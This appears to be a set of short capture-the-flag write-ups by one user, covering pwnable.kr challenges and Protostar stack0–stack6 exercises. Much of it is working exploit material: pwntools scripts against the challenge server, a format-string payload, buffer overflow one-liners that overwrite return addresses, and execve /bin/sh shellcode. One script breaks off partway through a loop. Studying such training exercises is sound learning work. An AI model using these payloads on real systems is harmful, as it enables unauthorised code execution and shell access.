parksjin01

from pwn import *
sh = remote('pwnable.kr', 9003)
sh.recv(1024)
sh.sendline('AAAA\x78\x92\x04\x08\x40\xeb\x11\x08'.encode('base64'))
a = sh.recv(10000)
a = a.split('\n')
print a[1]
sh.interactive()

parksjin01

from pwn import *
sh = ssh(host='pwnable.kr', user='fsb', password='guest', port=2222)
proc = sh.process('/home/fsb/fsb')
proc.recv(1024)
proc.sendline('1')
proc.recvuntil('\n')
proc.sendline('1')
proc.recvuntil('\n')
proc.sendline('%10x%10x%10x%10x%10x%10x%10x%10x%10x%10x%10x%10x%134520720c%n')

parksjin01

from pwn import *
sh = remote('pwnable.kr', 9004)
sh.recv(10000)
sh.sendline('2')
sh.recv(10000)
for _ in range(3):
        sh.sendline('1')
        sh.recv(10000)
for _ in range(4):

parksjin01

source code is at Source Code

<main+17> instruction is lea 0x1c(%esp), %eax and modified is at 0x1c(%esp).
Buffer is start at 0x5c(%esp) so buffer size is 0x5c-0x1c = 0x40. If we input more than 0x40 letters than we can get you have changed the 'modified' variable

If you want to get shell in this program we have to change ret address.
Payload is (Stack size[0x4c] + sfp + shellcode address) I will load my shellcode in env and I will use shellcode

parksjin01

Source code is at Source Code

This problem is really similar with stack0.
Differece between them is stack0 get input from user by gets. However stack1 get input from user by argv.
In main+55 instruction we can know buffer is start at %esp+0x1c
In main+67 instrcution we can know modified is at %esp+0x5c
First we have to type 0x40 letters to overflow buffer and next 4 letters should be dcba to get you have correctly got the variable to the right value this message
like this ./stack1 $(python -c 'print "a"*0x40+"dcba"')

If you want to get shell in this program I will use this Shellcode

parksjin01

Source code is at Source Code

Stack2 problem is similar with stack0 or stack1. Only difference between them is that stack2 get input from user by env. In main+21 instruction we can know variable is at %esp+0x5c
In main+52 instruction we can know modified is at %esp+0x58
In main+68 instruction we can know buffer is start at %esp+0x18

In this program it copy env[GREENIE] to buffer. So If env[GREENIE] is longer than 0x40 we can get you have correctly modified the variable Like this.

parksjin01

Source code is at Source Code

If we want to get code flow successfully changed this message we have to overwrite function pointer fp to address of win() function
In main+9 instruction we can know fp is at %esp+0x5c
In main+17 instruction we can know buffer is start at %esp+0x1c
win() function address is at 0x08048424
First we have to input 0x40 letters to overflow buffer and input 0x08048424 to write win() function address in fp.
Like this (python -c 'print "a"*0x40+"\x24\x84\x04\x08"';cat) | ./stack3

If you want to get shell in this program I will use Shellcode

parksjin01

Source code is at Source Code

We can get code flow successfully changed message easily by overwrite ret address
win() function address is 0x080483f4 Like this (python -c 'print "a"*0x4c+"\xf4\x83\x04\x08"';cat) | ./stack4

If you want to get shell in this program I will use Shellcode

export shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
(python -c 'print "a"*0x4c+"\xda\xfe\xff\xbf"';cat) | ./stack4

parksjin01

Source code is at Source Code

The goal of stack5 prob is get shellcode.
It's really easy isn't it???
I'll use Shellcode

export shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
(python -c 'print "a"*0x4c+"\xda\xfe\xff\xbf"';cat) | ./stack5

parksjin01

Source code is at Source Code I'll use Shellcode

stack6 prob goal is same with stack5. Just get a shell from this program.
We can't load shellcode in this problem because program check return address.
examiner give us 3 way to solve this problem.

-finding the duplicate of the payload -ret2libc -return orientated programming